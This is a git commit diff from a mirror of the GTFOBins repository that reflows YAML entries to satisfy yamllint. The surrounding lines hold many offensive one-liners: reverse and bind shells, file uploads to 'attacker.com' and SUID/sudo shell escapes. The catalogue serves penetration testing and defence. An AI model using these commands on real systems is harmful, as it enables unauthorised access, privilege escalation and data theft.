mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Fix YAMLs according to YAMLlint
This commit is contained in:
parent
785126ede0
commit
e1cd3aed68
5
Makefile
5
Makefile
@ -1,4 +1,4 @@
|
||||
.PHONY: serve serve-public bundle
|
||||
.PHONY: serve serve-public bundle lint
|
||||
|
||||
serve:
|
||||
bundle exec jekyll serve
|
||||
@ -8,3 +8,6 @@ serve-public:
|
||||
|
||||
bundle:
|
||||
bundle install
|
||||
|
||||
lint:
|
||||
yamllint . _gtfobins/*.md
|
||||
|
@ -1,3 +1,4 @@
|
||||
---
|
||||
title: GTFOBins
|
||||
|
||||
exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']
|
||||
|
@ -1,3 +1,4 @@
|
||||
---
|
||||
execute-interactive:
|
||||
label: Interactive execute
|
||||
description: |
|
||||
|
@ -9,15 +9,13 @@ functions:
|
||||
export RPORT=12345
|
||||
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
|
||||
upload:
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP
|
||||
service on the attacker box to collect the file.
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
|
||||
on the attacker box to collect the file.
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
@ -32,8 +30,7 @@ functions:
|
||||
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||
3<>/dev/tcp/$RHOST/$RPORT \
|
||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
|
||||
on the attacker box to send the file.
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
|
@ -1,6 +1,5 @@
|
||||
---
|
||||
description: |
|
||||
BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
|
||||
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
|
||||
what GTFBins binaries are supported. Here some example.
|
||||
functions:
|
||||
execute-interactive:
|
||||
@ -19,8 +18,7 @@ functions:
|
||||
LFILE=file_to_read
|
||||
./busybox cat "$LFILE"
|
||||
suid-enabled:
|
||||
- description: It may drop the SUID privileges depending on the compilation flags
|
||||
and the runtime configuration.
|
||||
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
|
||||
code: "./busybox sh"
|
||||
sudo-enabled:
|
||||
- code: sudo busybox sh
|
||||
|
@ -1,8 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send local file with an HTTP POST request. Run an HTTP service on
|
||||
the attacker box to collect the file.
|
||||
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
URL=http://attacker.com/
|
||||
LFILE=file_to_send
|
||||
|
@ -7,7 +7,7 @@ functions:
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
suid-enabled:
|
||||
- code: "./dash -p"
|
||||
- code: ./dash -p
|
||||
sudo-enabled:
|
||||
- code: sudo dash
|
||||
---
|
||||
|
@ -9,9 +9,7 @@ functions:
|
||||
ed file_to_write
|
||||
w
|
||||
file-read:
|
||||
- code: 'ed file_to_read
|
||||
|
||||
'
|
||||
- code: ed file_to_read
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ed
|
||||
|
@ -7,9 +7,7 @@ functions:
|
||||
emacs file_to_write
|
||||
C-x C-s
|
||||
file-read:
|
||||
- code: 'emacs file_to_read
|
||||
|
||||
'
|
||||
- code: emacs file_to_read
|
||||
suid-enabled:
|
||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||
sudo-enabled:
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
execute-interactive:
|
||||
- code: env /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./env /bin/sh -p"
|
||||
- code: ./env /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo env /bin/sh
|
||||
---
|
||||
|
@ -1,7 +1,5 @@
|
||||
---
|
||||
description: 'The read file content is corrupted by replacing tabs with spaces.
|
||||
|
||||
'
|
||||
description: The read file content is corrupted by replacing tabs with spaces.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
execute-interactive:
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
suid-enabled:
|
||||
- code: "./expect -c 'spawn /bin/sh -p;interact'"
|
||||
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
||||
sudo-enabled:
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
---
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
execute-interactive:
|
||||
- code: find . -exec /bin/sh \; -quit
|
||||
suid-enabled:
|
||||
- code: "./find . -exec /bin/sh -p \\; -quit"
|
||||
- code: ./find . -exec /bin/sh -p \; -quit
|
||||
sudo-enabled:
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
---
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
execute-interactive:
|
||||
- code: flock -u / /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./flock -u / /bin/sh -p"
|
||||
- code: ./flock -u / /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo flock -u / /bin/sh
|
||||
---
|
||||
|
@ -1,7 +1,5 @@
|
||||
---
|
||||
description: 'The read file content is not binary-safe.
|
||||
|
||||
'
|
||||
description: The read file content is not binary-safe.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
execute-interactive:
|
||||
- code: ionice /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./ionice /bin/sh -p"
|
||||
- code: ./ionice /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo ionice /bin/sh
|
||||
---
|
||||
|
@ -9,15 +9,13 @@ functions:
|
||||
export RPORT=12345
|
||||
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
|
||||
upload:
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP
|
||||
service on the attacker box to collect the file.
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
|
||||
on the attacker box to collect the file.
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
@ -32,8 +30,7 @@ functions:
|
||||
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||
3<>/dev/tcp/$RHOST/$RPORT \
|
||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
|
||||
on the attacker box to send the file.
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
@ -53,7 +50,7 @@ functions:
|
||||
export LFILE=file_to_read
|
||||
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
|
||||
suid-enabled:
|
||||
- code: "./ksh -p"
|
||||
- code: ./ksh -p
|
||||
sudo-enabled:
|
||||
- code: sudo ksh
|
||||
---
|
||||
|
@ -9,9 +9,9 @@ description: |
|
||||
```
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: "/lib/ld.so /bin/sh"
|
||||
- code: /lib/ld.so /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./ld.so /bin/sh -p"
|
||||
- code: ./ld.so /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
---
|
||||
|
@ -8,9 +8,7 @@ functions:
|
||||
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
||||
v
|
||||
file-read:
|
||||
- code: 'less file_to_read
|
||||
|
||||
'
|
||||
- code: less file_to_read
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo less /etc/profile
|
||||
|
@ -1,8 +1,5 @@
|
||||
---
|
||||
description: |
|
||||
All these examples only work with GNU `make` due to the lack of support of the
|
||||
`--eval` flag. The same can be achieved by using a proper `Makefile` or by
|
||||
passing the content via stdin using `-f -`.
|
||||
description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
|
@ -5,9 +5,7 @@ functions:
|
||||
man man
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: 'man file_to_read
|
||||
|
||||
'
|
||||
- code: man file_to_read
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo man man
|
||||
|
@ -5,9 +5,7 @@ functions:
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: 'more file_to_read
|
||||
|
||||
'
|
||||
- code: more file_to_read
|
||||
suid-enabled:
|
||||
- code: "./more file_to_read\n"
|
||||
sudo-enabled:
|
||||
|
@ -14,9 +14,7 @@ functions:
|
||||
nano file_to_write
|
||||
^O
|
||||
file-read:
|
||||
- code: 'nano file_to_read
|
||||
|
||||
'
|
||||
- code: nano file_to_read
|
||||
suid-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
|
@ -12,16 +12,14 @@ functions:
|
||||
LPORT=12345
|
||||
nc -l -p $LPORT -e /bin/sh
|
||||
upload:
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
|
||||
on the attacker box to collect the file.
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
nc $RHOST $RPORT < "$LFILE"
|
||||
download:
|
||||
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345
|
||||
< "file_to_send"` on the attacker box to send the file.
|
||||
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
LPORT=12345
|
||||
LFILE=file_to_save
|
||||
|
@ -1,8 +1,5 @@
|
||||
---
|
||||
description: 'The read file content is corrupted by a leading space added to each
|
||||
line.
|
||||
|
||||
'
|
||||
description: The read file content is corrupted by a leading space added to each line.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
|
@ -1,9 +1,8 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});''
|
||||
|
||||
'
|
||||
- code: |
|
||||
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
@ -26,13 +25,9 @@ functions:
|
||||
sh.stderr.pipe(client);
|
||||
}).listen(process.env.LPORT);'
|
||||
suid-enabled:
|
||||
- code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0,
|
||||
1, 2]});''
|
||||
|
||||
'
|
||||
- code: |
|
||||
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
||||
sudo-enabled:
|
||||
- code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1,
|
||||
2]});''
|
||||
|
||||
'
|
||||
- code: |
|
||||
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
---
|
||||
|
@ -1,7 +1,5 @@
|
||||
---
|
||||
description: |
|
||||
Three spaces are added before each character in the read file, and
|
||||
non-printable chars are printed as backslash escape sequences.
|
||||
description: Three spaces are added before each character in the read file, and non-printable chars are printed as backslash escape sequences.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
|
@ -27,8 +27,7 @@ functions:
|
||||
export RPORT=12345
|
||||
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server. This requires
|
||||
PHP version 5.4 or later.
|
||||
- description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
|
||||
code: |
|
||||
LHOST=0.0.0.0
|
||||
LPORT=8888
|
||||
|
@ -14,9 +14,7 @@ functions:
|
||||
pico file_to_write
|
||||
^O
|
||||
file-read:
|
||||
- code: 'pico file_to_read
|
||||
|
||||
'
|
||||
- code: pico file_to_read
|
||||
suid-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
|
@ -11,8 +11,7 @@ functions:
|
||||
export LFILE="/tmp/file_to_write"
|
||||
puppet apply -e "file { '$LFILE': content => 'data' }"
|
||||
file-read:
|
||||
- description: The read file content is corrupted by the `diff` output format. The
|
||||
actual `/usr/bin/diff` command is executed.
|
||||
- description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
puppet filebucket -l diff /dev/null $LFILE
|
||||
|
@ -3,15 +3,13 @@ functions:
|
||||
execute-interactive:
|
||||
- code: python2 -c 'import os; os.system("/bin/sh")'
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
|
||||
the attacker box to receive the shell.
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||
upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an
|
||||
HTTP service on the attacker box to collect the file.
|
||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
export LFILE=file_to_send
|
||||
|
@ -3,15 +3,13 @@ functions:
|
||||
execute-interactive:
|
||||
- code: python3 -c 'import os; os.system("/bin/sh")'
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
|
||||
the attacker box to receive the shell.
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||
upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an
|
||||
HTTP service on the attacker box to collect the file.
|
||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
export LFILE=file_to_send
|
||||
|
@ -3,13 +3,12 @@ functions:
|
||||
execute-interactive:
|
||||
- code: rlwrap /bin/sh
|
||||
file-write:
|
||||
- description: This adds timestamps to the output file. This relies on the external
|
||||
`echo` command.
|
||||
- description: This adds timestamps to the output file. This relies on the external `echo` command.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
rlwrap -l "$LFILE" echo data
|
||||
suid-enabled:
|
||||
- code: "./rlwrap -H /dev/null /bin/sh -p"
|
||||
- code: ./rlwrap -H /dev/null /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo rlwrap /bin/sh
|
||||
---
|
||||
|
@ -9,8 +9,7 @@ functions:
|
||||
export RPORT=12345
|
||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server. This requires
|
||||
version 1.9.2 or later.
|
||||
- description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
ruby -run -e httpd . -p $LPORT
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
execute-interactive:
|
||||
- code: setarch $(arch) /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./setarch $(arch) /bin/sh -p"
|
||||
- code: ./setarch $(arch) /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo setarch $(arch) /bin/sh
|
||||
---
|
||||
|
@ -1,15 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on
|
||||
the attacker box to receive the shell.
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
||||
bind-shell-interactive:
|
||||
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code>
|
||||
on the attacker box to connect to the shell.
|
||||
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
|
||||
|
@ -4,8 +4,7 @@ functions:
|
||||
- description: Reconnecting may help bypassing restricted shells.
|
||||
code: ssh localhost $SHELL --noprofile --norc
|
||||
- description: Spawn interactive shell through ProxyCommand option.
|
||||
code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'"
|
||||
x
|
||||
code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
@ -27,6 +26,5 @@ functions:
|
||||
ssh -F $LFILE localhost
|
||||
sudo-enabled:
|
||||
- description: Spawn interactive root shell through ProxyCommand option.
|
||||
code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh
|
||||
-i'" x
|
||||
code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
|
||||
---
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
execute-interactive:
|
||||
- code: stdbuf -i0 /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./stdbuf -i0 /bin/sh -p"
|
||||
- code: ./stdbuf -i0 /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo stdbuf -i0 /bin/sh
|
||||
---
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
execute-interactive:
|
||||
- code: strace -o /dev/null /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./strace -o /dev/null /bin/sh -p"
|
||||
- code: ./strace -o /dev/null /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo strace -o /dev/null /bin/sh
|
||||
---
|
||||
|
@ -20,5 +20,5 @@ functions:
|
||||
sudo-enabled:
|
||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
suid-limited:
|
||||
- code: "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
|
||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
---
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
execute-interactive:
|
||||
- code: taskset 1 /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./taskset 1 /bin/sh -p"
|
||||
- code: ./taskset 1 /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo taskset 1 /bin/sh
|
||||
---
|
||||
|
@ -1,7 +1,5 @@
|
||||
---
|
||||
description: 'It can only append data if the destination exists.
|
||||
|
||||
'
|
||||
description: It can only append data if the destination exists.
|
||||
functions:
|
||||
file-write:
|
||||
- code: |
|
||||
|
@ -1,12 +1,10 @@
|
||||
---
|
||||
description: |
|
||||
Note that the shell might have its own builtin time implementation, which may
|
||||
behave differently than` /usr/bin/time`, hence the absolute path.
|
||||
description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: "/usr/bin/time /bin/sh"
|
||||
- code: /usr/bin/time /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./time /bin/sh -p"
|
||||
- code: ./time /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo /usr/bin/time /bin/sh
|
||||
---
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
execute-interactive:
|
||||
- code: timeout 7d /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./timeout 7d /bin/sh -p"
|
||||
- code: ./timeout 7d /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo timeout --foreground 7d /bin/sh
|
||||
---
|
||||
|
@ -1,7 +1,5 @@
|
||||
---
|
||||
description: |
|
||||
The read file content is corrupted by replacing occurrences of `$'\b_'` to
|
||||
terminal sequences and by converting tabs to spaces.
|
||||
description: The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
|
@ -1,7 +1,5 @@
|
||||
---
|
||||
description: 'The read file content is corrupted by squashing multiple adjacent lines.
|
||||
|
||||
'
|
||||
description: The read file content is corrupted by squashing multiple adjacent lines.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
execute-interactive:
|
||||
- code: unshare /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./unshare -r /bin/sh"
|
||||
- code: ./unshare -r /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo unshare /bin/sh
|
||||
---
|
||||
|
@ -11,11 +11,9 @@ functions:
|
||||
vi file_to_write
|
||||
w
|
||||
file-read:
|
||||
- code: 'vi file_to_read
|
||||
|
||||
'
|
||||
- code: vi file_to_read
|
||||
suid-enabled:
|
||||
- code: "./vi -c ':!/bin/sh -p'"
|
||||
- code: ./vi -c ':!/bin/sh -p'
|
||||
sudo-enabled:
|
||||
- code: sudo vi -c ':!/bin/sh'
|
||||
---
|
||||
|
@ -4,9 +4,9 @@ functions:
|
||||
- code: watch /usr/bin/id
|
||||
suid-enabled:
|
||||
- description: This keeps the SUID privileges only if the `-x` option is present.
|
||||
code: "./watch -x /usr/bin/id"
|
||||
code: ./watch -x /usr/bin/id
|
||||
sudo-enabled:
|
||||
- code: sudo watch /usr/bin/id
|
||||
suid-limited:
|
||||
- code: "./watch /usr/bin/id"
|
||||
- code: ./watch /usr/bin/id
|
||||
---
|
||||
|
@ -1,8 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
|
||||
Run an HTTP service on the attacker box to collect the file.
|
||||
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
export LFILE=file_to_send
|
||||
|
@ -1,34 +1,28 @@
|
||||
---
|
||||
description: "`whois` hangs waiting for the remote peer to close the socket.\n"
|
||||
description: |
|
||||
`whois` hangs waiting for the remote peer to close the socket.
|
||||
functions:
|
||||
upload:
|
||||
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
|
||||
on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'`
|
||||
and its length is limited by the maximum size of arguments.
|
||||
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
whois -h $RHOST -p $RPORT "`cat $LFILE`"
|
||||
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d'
|
||||
| base64 -d > "file_to_save"` on the attacker box to collect the file. The file
|
||||
length is limited by the maximum size of arguments.
|
||||
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
whois -h $RHOST -p $RPORT "`base64 $LFILE`"
|
||||
download:
|
||||
- description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345
|
||||
< "file_to_send"` on the attacker box to send the file. The file has instances
|
||||
of `$'\x0d'` stripped.
|
||||
- description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_save
|
||||
whois -h $RHOST -p $RPORT > "$LFILE"
|
||||
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send"
|
||||
| nc -l -p 12345` on the attacker box to send the file.
|
||||
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
|
@ -3,14 +3,12 @@ functions:
|
||||
execute-non-interactive:
|
||||
- code: xargs -a /dev/null /usr/bin/id
|
||||
file-read:
|
||||
- description: This works as long as the file does not contain the NUL character,
|
||||
also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed.
|
||||
GNU version only.
|
||||
- description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
xargs -a "$LFILE" -0
|
||||
suid-enabled:
|
||||
- code: "./xargs -a /dev/null /usr/bin/id"
|
||||
- code: ./xargs -a /dev/null /usr/bin/id
|
||||
sudo-enabled:
|
||||
- code: sudo xargs -a /dev/null /usr/bin/id
|
||||
---
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
execute-interactive:
|
||||
- code: zsh
|
||||
suid-enabled:
|
||||
- code: "./zsh"
|
||||
- code: ./zsh
|
||||
sudo-enabled:
|
||||
- code: sudo zsh
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user